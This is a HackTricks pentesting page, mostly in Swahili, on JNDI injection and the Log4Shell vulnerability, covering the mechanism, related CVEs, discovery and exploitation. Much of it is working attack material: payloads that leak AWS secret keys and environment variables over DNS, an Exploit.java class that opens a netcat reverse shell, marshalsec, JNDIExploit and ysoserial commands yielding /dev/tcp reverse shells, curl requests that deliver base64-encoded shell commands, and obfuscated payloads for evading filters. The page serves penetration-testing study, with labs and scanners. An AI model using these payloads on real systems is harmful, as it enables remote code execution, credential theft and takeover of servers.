hacktricks/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md

479 lines
32 KiB
Markdown
Raw Normal View History

2022-05-17 22:16:42 +00:00
# JNDI - Java Naming and Directory Interface & Log4Shell
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2024-02-03 14:45:32 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}
2022-04-28 16:01:33 +00:00
**Try Hard Security Group**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
***
## Basic Information
2021-12-24 01:52:37 +00:00
JNDI, iliyounganishwa katika Java tangu mwishoni mwa miaka ya 1990, inatumika kama huduma ya directory, ikiruhusu programu za Java kutafuta data au vitu kupitia mfumo wa majina. Inasaidia huduma mbalimbali za directory kupitia interfaces za mtoa huduma (SPIs), ikiruhusu upatikanaji wa data kutoka kwa mifumo tofauti, ikiwa ni pamoja na vitu vya Java vya mbali. SPIs maarufu ni pamoja na CORBA COS, Java RMI Registry, na LDAP.
### JNDI Naming Reference
2021-12-24 01:52:37 +00:00
Vitu vya Java vinaweza kuhifadhiwa na kupatikana kwa kutumia JNDI Naming References, ambazo zinakuja katika aina mbili:
2021-12-24 01:52:37 +00:00
* **Reference Addresses**: Inabainisha eneo la kitu (mfano, _rmi://server/ref_), ikiruhusu upatikanaji wa moja kwa moja kutoka anwani iliyoainishwa.
* **Remote Factory**: Inarejelea darasa la kiwanda cha mbali. Wakati inapoingia, darasa linapakuliwa na kuanzishwa kutoka eneo la mbali.
2021-12-24 01:52:37 +00:00
Hata hivyo, mekanism hii inaweza kutumika vibaya, na inaweza kusababisha upakiaji na utekelezaji wa msimbo usio na mipaka. Kama hatua ya kupambana:
2021-12-26 17:34:46 +00:00
* **RMI**: `java.rmi.server.useCodeabseOnly = true` kwa default kutoka JDK 7u21, ikizuia upakiaji wa vitu vya mbali. Meneja wa Usalama pia hupunguza kile kinachoweza kupakuliwa.
* **LDAP**: `com.sun.jndi.ldap.object.trustURLCodebase = false` kwa default kutoka JDK 6u141, 7u131, 8u121, ikizuia utekelezaji wa vitu vya Java vilivyopakiwa kwa mbali. Ikiwa imewekwa kuwa `true`, utekelezaji wa msimbo wa mbali unaweza kufanyika bila uangalizi wa Meneja wa Usalama.
* **CORBA**: Haina mali maalum, lakini Meneja wa Usalama daima yuko hai.
2021-12-26 17:34:46 +00:00
Hata hivyo, **Meneja wa Majina**, anayehusika na kutatua viungo vya JNDI, hana mekanism za usalama zilizojengwa, na inaweza kuruhusu upatikanaji wa vitu kutoka chanzo chochote. Hii inatoa hatari kwani ulinzi wa RMI, LDAP, na CORBA unaweza kupuuzia, na kusababisha upakiaji wa vitu vya Java vya kiholela au kutumia vipengele vilivyopo vya programu (gadgets) ili kutekeleza msimbo mbaya.
2021-12-26 17:34:46 +00:00
Mifano ya URLs zinazoweza kutumika vibaya ni pamoja na:
2021-12-26 17:34:46 +00:00
* _rmi://attacker-server/bar_
* _ldap://attacker-server/bar_
* _iiop://attacker-server/bar_
2021-12-26 17:34:46 +00:00
Licha ya ulinzi, udhaifu bado upo, hasa kutokana na ukosefu wa kinga dhidi ya upakiaji wa JNDI kutoka vyanzo visivyoaminika na uwezekano wa kupita ulinzi uliopo.
2021-12-26 17:34:46 +00:00
### JNDI Example
2021-12-26 17:34:46 +00:00
![](<../../.gitbook/assets/image (1022).png>)
2021-12-26 17:34:46 +00:00
Hata kama umeweka **`PROVIDER_URL`**, unaweza kuashiria nyingine katika utafutaji na itapatikana: `ctx.lookup("<attacker-controlled-url>")` na hiyo ndiyo itakayotumiwa na mshambuliaji kupakia vitu vya kiholela kutoka mfumo unaodhibitiwa na yeye.
2021-12-26 17:34:46 +00:00
### CORBA Overview
2021-12-26 17:34:46 +00:00
CORBA (Common Object Request Broker Architecture) inatumia **Interoperable Object Reference (IOR)** kutambulisha kwa kipekee vitu vya mbali. Rejeleo hili lina habari muhimu kama:
2021-12-26 17:34:46 +00:00
* **Type ID**: Kitambulisho cha kipekee kwa interface.
* **Codebase**: URL ya kupata darasa la stub.
2021-12-26 17:34:46 +00:00
Kwa hakika, CORBA sio hatari kwa asili. Kuhakikisha usalama kawaida kunahusisha:
2021-12-26 17:34:46 +00:00
* Usakinishaji wa **Meneja wa Usalama**.
* Kuunda Meneja wa Usalama ili kuruhusu muunganisho kwa vyanzo vya msimbo vinavyoweza kuwa na madhara. Hii inaweza kufanywa kupitia:
* Ruhusa ya Socket, mfano, `permissions java.net.SocketPermission "*:1098-1099", "connect";`.
* Ruhusa za kusoma faili, ama kwa ujumla (`permission java.io.FilePermission "<<ALL FILES>>", "read";`) au kwa saraka maalum ambapo faili mbaya zinaweza kuwekwa.
2021-12-26 17:34:46 +00:00
Hata hivyo, sera za wauzaji wengine zinaweza kuwa na huruma na kuruhusu muunganisho haya kwa default.
2024-02-06 14:12:47 +00:00
### RMI Context
2024-02-06 14:12:47 +00:00
Kwa RMI (Remote Method Invocation), hali ni tofauti kidogo. Kama ilivyo kwa CORBA, upakiaji wa darasa la kiholela umewekwa mipaka kwa default. Ili kutumia RMI, mtu angehitaji kawaida kupita Meneja wa Usalama, jambo ambalo pia lina umuhimu katika CORBA.
2021-12-26 17:34:46 +00:00
2022-05-17 22:16:42 +00:00
### LDAP
2021-12-26 17:34:46 +00:00
Kwanza kabisa, tunahitaji kutofautisha kati ya Utafutaji na Utafutaji.\
**Utafutaji** utatumia URL kama `ldap://localhost:389/o=JNDITutorial` kutafuta kitu cha JNDITutorial kutoka kwa seva ya LDAP na **kupata sifa zake**.\
**Utafutaji** unakusudia **huduma za majina** kwani tunataka kupata **chochote kilichofungwa kwa jina**.
Ikiwa utafutaji wa LDAP ulitolewa kwa **SearchControls.setReturningObjFlag() na `true`, basi kitu kilichorejeshwa kitajengwa upya**.
Kwa hivyo, kuna njia kadhaa za kushambulia chaguo hizi.\
**Mshambuliaji anaweza kuharibu rekodi za LDAP kwa kuingiza payloads** juu yao ambazo zitatekelezwa katika mifumo inayozikusanya (ni muhimu sana **kuharibu mashine kumi** ikiwa una ufikiaji wa seva ya LDAP). Njia nyingine ya kutumia hii ingekuwa kufanya **shambulio la MitM katika utafutaji wa LDAP** kwa mfano.
Ikiwa unaweza **kufanya programu kutatua JNDI LDAP URL**, unaweza kudhibiti LDAP ambayo itatafutwa, na unaweza kutuma nyuma exploit (log4shell).
#### Deserialization exploit
![](<../../.gitbook/assets/image (275).png>)
**exploit imeandikwa** na itakaguliwa.\
Ikiwa `trustURLCodebase` ni `true`, mshambuliaji anaweza kutoa madarasa yake mwenyewe katika codebase ikiwa sivyo, atahitaji kutumia gadgets katika classpath.
2021-12-26 17:34:46 +00:00
#### JNDI Reference exploit
2021-12-26 17:34:46 +00:00
Ni rahisi kushambulia LDAP hii kwa kutumia **JavaFactory references**:
2021-12-26 17:34:46 +00:00
![](<../../.gitbook/assets/image (1059).png>)
2021-12-26 17:34:46 +00:00
## Log4Shell Vulnerability
Udhaifu umeanzishwa katika Log4j kwa sababu inasaidia [**sintaks maalum**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution) katika mfumo wa `${prefix:name}` ambapo `prefix` ni moja ya nambari tofauti za [**Lookups**](https://logging.apache.org/log4j/2.x/manual/lookups.html) ambapo `name` inapaswa kutathminiwa. Kwa mfano, `${java:version}` ni toleo la sasa linalotumika la Java.
2021-12-26 17:34:46 +00:00
[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313) ilianzisha kipengele cha `jndi` Lookup. Kipengele hiki kinaruhusu upatikanaji wa mabadiliko kupitia JNDI. Kawaida, funguo huwekwa kiotomatiki na `java:comp/env/`. Hata hivyo, ikiwa funguo yenyewe ina **":"**, prefix hii ya default haitumiki.
2021-12-26 17:34:46 +00:00
Ikiwa **: inapatikana** katika funguo, kama katika `${jndi:ldap://example.com/a}` hakuna **prefix** na **seva ya LDAP inatafutwa kwa kitu**. Na hizi Lookups zinaweza kutumika katika usanidi wa Log4j na pia wakati mistari inarekodiwa.
2021-12-26 17:34:46 +00:00
Kwa hivyo, jambo pekee linalohitajika kupata RCE ni **toleo hatari la Log4j linaloshughulikia habari inayodhibitiwa na mtumiaji**. Na kwa sababu hii ni maktaba inayotumiwa sana na programu za Java kurekodi habari (programu zinazokabiliwa na mtandao zikiwemo) ilikuwa ya kawaida kuwa na log4j ikirekodi kwa mfano vichwa vya HTTP vilivyopokelewa kama User-Agent. Hata hivyo, log4j **haitumiki kurekodi tu habari za HTTP bali pia pembejeo yoyote** na data ambayo mendelezi alionyesha.
## Overview of Log4Shell-Related CVEs
2021-12-26 17:34:46 +00:00
### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[Critical]**
Udhaifu huu ni **kasoro ya deserialization isiyoaminika** katika sehemu ya `log4j-core`, inayoathiri toleo kuanzia 2.0-beta9 hadi 2.14.1. Inaruhusu **utekelezaji wa msimbo wa mbali (RCE)**, ikiruhusu washambuliaji kuchukua mifumo. Tatizo hili liliripotiwa na Chen Zhaojun kutoka Timu ya Usalama ya Alibaba Cloud na linaathiri mifumo mbalimbali ya Apache. Marekebisho ya awali katika toleo 2.15.0 hayakuwa kamili. Sheria za Sigma za ulinzi zinapatikana ([Rule 1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j\_fields.yml), [Rule 2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j.yml)).
### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[Critical]**
Kwanza ilikadiriawa kuwa ya chini lakini baadaye ikapandishwa kuwa hatari, CVE hii ni **kasoro ya Denial of Service (DoS)** inayotokana na marekebisho yasiyokamilika katika 2.15.0 kwa CVE-2021-44228. Inaathiri usanidi usio wa default, ikiruhusu washambuliaji kusababisha mashambulizi ya DoS kupitia payloads zilizoundwa. [Tweet](https://twitter.com/marcioalm/status/1471740771581652995) inaonyesha njia ya kupita. Tatizo hili limeondolewa katika matoleo 2.16.0 na 2.12.2 kwa kuondoa mifumo ya utafutaji wa ujumbe na kuzima JNDI kwa default.
### [CVE-2021-4104](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[High]**
Inayoathiri **matoleo ya Log4j 1.x** katika usanidi usio wa default ukitumia `JMSAppender`, CVE hii ni kasoro ya deserialization isiyoaminika. Hakuna marekebisho yanayopatikana kwa tawi la 1.x, ambalo limefikia mwisho wa maisha, na inashauriwa kuboresha hadi `log4j-core 2.17.0`.
2021-12-26 17:34:46 +00:00
### [CVE-2021-42550](https://nvd.nist.gov/vuln/detail/CVE-2021-42550) **\[Moderate]**
2021-12-24 01:52:37 +00:00
Udhaifu huu unaathiri **mfumo wa kurekodi wa Logback**, mrithi wa Log4j 1.x. Awali ilidhaniwa kuwa salama, mfumo huu ulipatikana kuwa na udhaifu, na matoleo mapya (1.3.0-alpha11 na 1.2.9) yameachiliwa ili kushughulikia tatizo hili.
2021-12-24 01:52:37 +00:00
### **CVE-2021-45105** **\[High]**
2021-12-24 01:52:37 +00:00
Log4j 2.16.0 ina kasoro ya DoS, ikichochea kutolewa kwa `log4j 2.17.0` ili kurekebisha CVE. Maelezo zaidi yanaweza kupatikana katika ripoti ya BleepingComputer [report](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/).
2024-02-06 14:12:47 +00:00
### [CVE-2021-44832](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)
Inayoathiri toleo la log4j 2.17, CVE hii inahitaji mshambuliaji kudhibiti faili ya usanidi ya log4j. Inahusisha uwezekano wa utekelezaji wa msimbo wa kiholela kupitia JDBCAppender iliyowekwa. Maelezo zaidi yanapatikana katika [blogi ya Checkmarx](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/).
2021-12-24 01:52:37 +00:00
## Log4Shell Exploitation
2021-12-24 01:52:37 +00:00
### Discovery
2021-12-24 01:52:37 +00:00
Udhaifu huu ni rahisi sana kugundua ikiwa hauna ulinzi kwa sababu itatuma angalau **ombio la DNS** kwa anwani unayoashiria katika payload yako. Kwa hivyo, payloads kama:
2021-12-24 01:52:37 +00:00
* `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}` (ukitumia [canarytokens.com](https://canarytokens.org/generate))
* `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}` (ukitumia [interactsh](https://github.com/projectdiscovery/interactsh))
* `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}` (ukitumia Burp Suite)
* `${jndi:ldap://2j4ayo.dnslog.cn}` (ukitumia [dnslog](http://dnslog.cn))
* `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}` ukitumia (ukitumia [huntress](https://log4shell.huntress.com))
2021-12-24 01:52:37 +00:00
Kumbuka kuwa **hata kama ombi la DNS linapokelewa hiyo haimaanishi kuwa programu inaweza kutumika vibaya** (au hata kuwa na udhaifu), utahitaji kujaribu kuishambulia.
2021-12-24 01:52:37 +00:00
{% hint style="info" %}
Kumbuka kuwa ili **ku exploit toleo 2.15** unahitaji kuongeza **bypass ya ukaguzi wa localhost**: ${jndi:ldap://**127.0.0.1#**...}
2021-12-24 01:52:37 +00:00
{% endhint %}
#### **Local Discovery**
2021-12-24 07:57:58 +00:00
Tafuta **matoleo ya ndani yenye udhaifu** ya maktaba kwa:
2021-12-24 07:57:58 +00:00
```bash
find / -name "log4j-core*.jar" 2>/dev/null | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])"
```
### **Uthibitisho**
2021-12-24 07:57:58 +00:00
Baadhi ya majukwaa yaliyoorodheshwa hapo awali yatakuruhusu kuingiza baadhi ya data za mabadiliko ambazo zitaandikwa wakati zinapohitajika.\
Hii inaweza kuwa muhimu sana kwa mambo mawili:
2021-12-24 01:52:37 +00:00
* Ili **kuhakiki** udhaifu
* Ili **kuondoa taarifa** kwa kutumia udhaifu
2021-12-24 01:52:37 +00:00
Kwa mfano unaweza kuomba kitu kama:\
au kama `${`**`jndi:ldap://jv-${sys:java.version}-hn-${hostName}.ei4frk.dnslog.cn/a}`** na ikiwa **ombio la DNS linapokelewa na thamani ya mabadiliko ya env**, unajua programu hiyo ina udhaifu.
2021-12-24 01:52:37 +00:00
Taarifa nyingine unazoweza kujaribu **kuvuja**:
2021-12-26 01:35:57 +00:00
```
${env:AWS_ACCESS_KEY_ID}
${env:AWS_CONFIG_FILE}
${env:AWS_PROFILE}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:HOSTNAME}
${env:JAVA_VERSION}
${env:PATH}
${env:USER}
${hostName}
${java.vendor}
${java:os}
${java:version}
${log4j:configParentLocation}
${sys:PROJECT_HOME}
${sys:file.separator}
${sys:java.class.path}
${sys:java.class.path}
${sys:java.class.version}
${sys:java.compiler}
${sys:java.ext.dirs}
${sys:java.home}
${sys:java.io.tmpdir}
${sys:java.library.path}
${sys:java.specification.name}
${sys:java.specification.vendor}
${sys:java.specification.version}
${sys:java.vendor.url}
${sys:java.vendor}
${sys:java.version}
${sys:java.vm.name}
${sys:java.vm.specification.name}
${sys:java.vm.specification.vendor}
${sys:java.vm.specification.version}
${sys:java.vm.vendor}
${sys:java.vm.version}
${sys:line.separator}
${sys:os.arch}
${sys:os.name}
${sys:os.version}
${sys:path.separator}
${sys:user.dir}
${sys:user.home}
${sys:user.name}
Any other env variable name that could store sensitive information
```
### RCE Information
2021-12-26 01:35:57 +00:00
{% hint style="info" %}
Mikondo inayotumia toleo la JDK zaidi ya 6u141, 7u131, au 8u121 imehifadhiwa dhidi ya shambulio la kupakia darasa la LDAP. Hii ni kutokana na kuzima kwa chaguo-msingi `com.sun.jndi.ldap.object.trustURLCodebase`, ambayo inazuia JNDI kupakia msingi wa msimbo wa mbali kupitia LDAP. Hata hivyo, ni muhimu kutambua kwamba toleo hizi **hazihifadhiwi dhidi ya shambulio la deserialization**.
2024-02-06 14:12:47 +00:00
Kwa washambuliaji wanaolenga kutumia toleo hizi za JDK za juu, ni muhimu kutumia **gadget iliyoaminika** ndani ya programu ya Java. Zana kama ysoserial au JNDIExploit mara nyingi hutumika kwa kusudi hili. Kinyume chake, kutumia toleo la chini la JDK ni rahisi zaidi kwani toleo hizi zinaweza kudhibitiwa ili kupakia na kutekeleza madarasa yasiyo na mipaka.
2021-12-26 01:35:57 +00:00
Kwa **maelezo zaidi** (_kama vile vikwazo kwenye RMI na CORBA vectors_) **angalia sehemu ya awali ya JNDI Naming Reference** au [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/)
2021-12-26 01:35:57 +00:00
{% endhint %}
### RCE - Marshalsec with custom payload
2021-12-26 01:35:57 +00:00
Unaweza kujaribu hii katika **THM box:** [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
2021-12-26 01:35:57 +00:00
Tumia zana [**marshalsec**](https://github.com/mbechler/marshalsec) (toleo la jar linapatikana [**hapa**](https://github.com/RandomRobbieBF/marshalsec-jar)). Njia hii inaanzisha seva ya rufaa ya LDAP ili kuelekeza muunganisho kwenye seva ya HTTP ya pili ambapo exploit itakuwa ikihifadhiwa:
2021-12-26 01:35:57 +00:00
```bash
2022-05-17 22:16:42 +00:00
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your_ip_http_server>:8000/#Exploit"
2021-12-26 01:35:57 +00:00
```
Ili kumshawishi lengo kupakia msimbo wa reverse shell, tengeneza faili la Java lililo na jina `Exploit.java` lenye maudhui yafuatayo:
2021-12-26 01:35:57 +00:00
```java
public class Exploit {
2024-02-11 02:13:58 +00:00
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999");
} catch (Exception e) {
e.printStackTrace();
}
}
2021-12-26 01:35:57 +00:00
}
```
Kusanya faili la Java kuwa faili la darasa kwa kutumia: `javac Exploit.java -source 8 -target 8`. Kisha, anzisha **HTTP server** katika saraka inayoshikilia faili la darasa kwa kutumia: `python3 -m http.server`. Hakikisha **marshalsec LDAP server** inarejelea HTTP server hii.
2021-12-26 01:35:57 +00:00
Chochea utekelezaji wa darasa la exploit kwenye seva ya wavuti iliyo hatarini kwa kutuma mzigo unaofanana na:
2021-12-26 01:35:57 +00:00
```bash
${jndi:ldap://<LDAP_IP>:1389/Exploit}
```
**Kumbuka:** Huu uvamizi unategemea usanidi wa Java kuruhusu upakiaji wa msingi wa msimbo wa mbali kupitia LDAP. Ikiwa hii hairuhusiwi, fikiria kutumia darasa lililoaminika kwa utekelezaji wa msimbo wa kiholela.
2021-12-24 01:52:37 +00:00
2022-05-17 22:16:42 +00:00
### RCE - **JNDIExploit**
2021-12-25 01:37:23 +00:00
{% hint style="info" %}
Kumbuka kwamba kwa sababu fulani mwandishi aliondoa mradi huu kutoka github baada ya kugunduliwa kwa log4shell. Unaweza kupata toleo lililohifadhiwa katika [https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) lakini ikiwa unataka kuheshimu uamuzi wa mwandishi tumia njia tofauti ya kutumia hii vuln.
2021-12-25 01:37:23 +00:00
Zaidi ya hayo, huwezi kupata msimbo wa chanzo katika mashine ya wayback, hivyo changanua msimbo wa chanzo, au tekeleza jar ukijua kwamba hujui unachotekeleza.
2021-12-25 01:37:23 +00:00
{% endhint %}
Kwa mfano huu unaweza tu kuendesha **seva ya wavuti iliyo hatarini kwa log4shell** katika bandari 8080: [https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) (_katika README utaona jinsi ya kuendesha_). Hii programu iliyo hatarini inarekodi kwa toleo hatarishi la log4shell yaliyomo katika kichwa cha ombi la HTTP _X-Api-Version_.
2021-12-25 01:37:23 +00:00
Kisha, unaweza kupakua faili ya **JNDIExploit** jar na kuitekeleza kwa:
2021-12-26 01:35:57 +00:00
```bash
2022-05-17 22:16:42 +00:00
wget https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
2021-12-25 01:37:23 +00:00
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 # Use your private IP address and a port where the victim will be able to access
```
Baada ya kusoma msimbo kwa dakika chache tu, katika _com.feihong.ldap.LdapServer_ na _com.feihong.ldap.HTTPServer_ unaweza kuona jinsi **seva za LDAP na HTTP zinavyoundwa**. Seva ya LDAP itakielewa kile payload kinachohitajika kutolewa na itamwelekeza mwathirika kwenye seva ya HTTP, ambayo itatoa exploit.\
Katika _com.feihong.ldap.gadgets_ unaweza kupata **gadgets maalum** ambazo zinaweza kutumika kutekeleza kitendo kinachotakiwa (kwa uwezekano kutekeleza msimbo wa kiholela). Na katika _com.feihong.ldap.template_ unaweza kuona madarasa tofauti ya template ambayo yat **azalisha exploits**.
2021-12-25 01:37:23 +00:00
Unaweza kuona exploits zote zinazopatikana kwa **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`**. Baadhi ya zile muhimu ni:
2021-12-25 01:37:23 +00:00
```bash
ldap://null:1389/Basic/Dnslog/[domain]
ldap://null:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://null:1389/Basic/ReverseShell/[ip]/[port]
# But there are a lot more
```
Hivyo, katika mfano wetu, tayari tuna hiyo programu ya docker iliyo hatarini ikifanya kazi. Ili kuishambulia:
2021-12-25 01:37:23 +00:00
```bash
# Create a file inside of th vulnerable host:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
# Get a reverse shell (only unix)
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/ReverseShell/172.17.0.1/4444}'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMSA0NDQ0IC1lIC9iaW4vc2gK}'
```
Wakati wa kutuma mashambulizi utaona baadhi ya matokeo kwenye terminal ambapo ulitekeleza **JNDIExploit-1.2-SNAPSHOT.jar**.
2021-12-25 01:37:23 +00:00
**Kumbuka kuangalia `java -jar JNDIExploit-1.2-SNAPSHOT.jar -u` kwa chaguzi nyingine za unyakuzi. Aidha, ikiwa unahitaji, unaweza kubadilisha bandari za seva za LDAP na HTTP.**
2021-12-25 01:37:23 +00:00
2022-05-17 22:16:42 +00:00
### RCE - JNDI-Exploit-Kit <a href="#rce__jndiexploitkit_33" id="rce__jndiexploitkit_33"></a>
2021-12-25 01:37:23 +00:00
Kwa njia sawa na unyakuzi wa awali, unaweza kujaribu kutumia [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) kutekeleza udhaifu huu.\
Unaweza kuunda URL za kutuma kwa mwathirika ukikimbia:
2021-12-25 01:37:23 +00:00
```bash
# Get reverse shell in port 4444 (only unix)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -S 172.17.0.1:4444
# Execute command
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -C "touch /tmp/log4shell"
```
_Shambulio hili linalotumia kitu cha java kilichoundwa maalum litafanya kazi katika maabara kama **THM solar room**. Hata hivyo, hii kwa ujumla haitafanya kazi (kwa sababu kwa kawaida Java haijasanidiwa kupakia msingi wa msimbo wa mbali kwa kutumia LDAP) nadhani kwa sababu haipati faida ya darasa lililoaminika ili kutekeleza msimbo wa kiholela._
### RCE - JNDI-Injection-Exploit-Plus
[https://github.com/cckuailong/JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus) ni chombo kingine cha kuzalisha **viungo vya JNDI vinavyofanya kazi** na kutoa huduma za msingi kwa kuanzisha seva ya RMI, seva ya LDAP na seva ya HTTP.\
2021-12-25 01:37:23 +00:00
2022-05-17 22:16:42 +00:00
### RCE - ysoserial & JNDI-Exploit-Kit
2021-12-25 01:37:23 +00:00
Chaguo hili ni muhimu sana kushambulia **matoleo ya Java yaliyo sanidiwa kuamini tu madarasa yaliyotajwa na si kila mtu**. Kwa hivyo, **ysoserial** itatumika kuzalisha **mifano ya madarasa yaliyoaminika** ambayo yanaweza kutumika kama vifaa vya **kutekeleza msimbo wa kiholela** (_darasa lililoaminika linalotumiwa na ysoserial lazima litumike na programu ya java ya mwathirika ili shambulio lifanye kazi_).
2021-12-24 01:52:37 +00:00
Kwa kutumia **ysoserial** au [**ysoserial-modified**](https://github.com/pimps/ysoserial-modified) unaweza kuunda shambulio la deserialization ambalo litapakuliwa na JNDI:
2021-12-24 01:52:37 +00:00
```bash
# Rev shell via CommonsCollections5
java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.14.10/7878 0>&1' > /tmp/cc5.ser
```
Tumia [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) kuunda **viungo vya JNDI** ambavyo shambulio litakuwa likisubiri muunganisho kutoka kwa mashine zenye udhaifu. Unaweza kuhudumia **shambulio tofauti ambazo zinaweza kuundwa kiotomatiki** na JNDI-Exploit-Kit au hata **payloads zako za deserialization** (zilizoundwa na wewe au ysoserial).
2021-12-24 01:52:37 +00:00
```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
```
![](<../../.gitbook/assets/image (1118).png>)
2021-12-24 01:52:37 +00:00
Sasa unaweza kwa urahisi kutumia kiungo cha JNDI kilichozalishwa kutekeleza udhaifu na kupata **reverse shell** kwa kutuma kwa toleo lenye udhaifu la log4j: **`${ldap://10.10.14.10:1389/generated}`**
2021-12-24 01:52:37 +00:00
### Bypasses
2021-12-24 01:52:37 +00:00
```java
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/} //Notice the use of rmi
2021-12-26 01:35:57 +00:00
${${::-j}ndi:dns://attackerendpoint.com/} //Notice the use of dns
2021-12-24 01:52:37 +00:00
${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
```
### Automatic Scanners
2021-12-24 01:52:37 +00:00
* [https://github.com/fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan)
* [https://github.com/adilsoybali/Log4j-RCE-Scanner](https://github.com/adilsoybali/Log4j-RCE-Scanner)
* [https://github.com/silentsignal/burp-log4shell](https://github.com/silentsignal/burp-log4shell)
* [https://github.com/cisagov/log4j-scanner](https://github.com/cisagov/log4j-scanner)
* [https://github.com/Qualys/log4jscanwin](https://github.com/Qualys/log4jscanwin)
* [https://github.com/hillu/local-log4j-vuln-scanner](https://github.com/hillu/local-log4j-vuln-scanner)
* [https://github.com/logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
* [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - Pata maktaba za ndani zenye udhaifu
2021-12-24 01:52:37 +00:00
### Labs to test
2021-12-24 01:52:37 +00:00
* [**LogForge HTB machine**](https://app.hackthebox.com/tracks/UHC-track)
* [**Try Hack Me Solar room**](https://tryhackme.com/room/solar)
